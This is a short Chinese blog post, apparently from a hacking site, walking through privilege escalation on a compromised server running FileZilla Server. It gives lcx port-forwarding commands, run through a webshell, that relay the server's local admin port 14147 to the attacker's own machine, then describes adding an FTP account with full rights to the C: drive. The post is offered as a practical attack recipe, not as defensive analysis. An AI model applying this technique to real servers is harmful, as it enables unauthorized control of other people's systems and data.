FileZilla Server提权实例演示

分类:安全 | 2011-08-17 | 撸过 104 次
0人扯谈

前段时间lengf牛写了篇文章关于FileZilla Server的提权测试,俺看了也觉得不错 这不今天刚好遇上一个FileZilla Server的服务器,咋试试提权。当然lengf牛的是在FileZilla Server的目录有可写权限修改配置文件的情况下。如果目录不可写是否没办法了呢,大家有没有想到G6FTP如何提权的, G6FTP是把本机管理端口转发到自己的机器然后远程连接ftp服务器的。

  

这个是我复制回来的 服务器的管理信息

下面看我今天的演示:

本机执行lcx监听

lcx2 -listen 51 2001

  

Webshell下上传lcx 转发

Lcx –slave 你的ip 端口 要转发的ip 要转发端口

然后回到本地查看

然后本地下载FileZilla Server 运行 然后连接本机的2001  因为我是把远程服务器的14147端口转发到本机的2001了 所以大家千万别误解

  

然后用户 添加av 目录c盘 权限选择所有

下面登录ftp看看

本站内容均为原创,转载请务必保留署名与链接!
FileZilla Server提权实例演示:https://www.webshell.cc/452.html
标签:

相关日志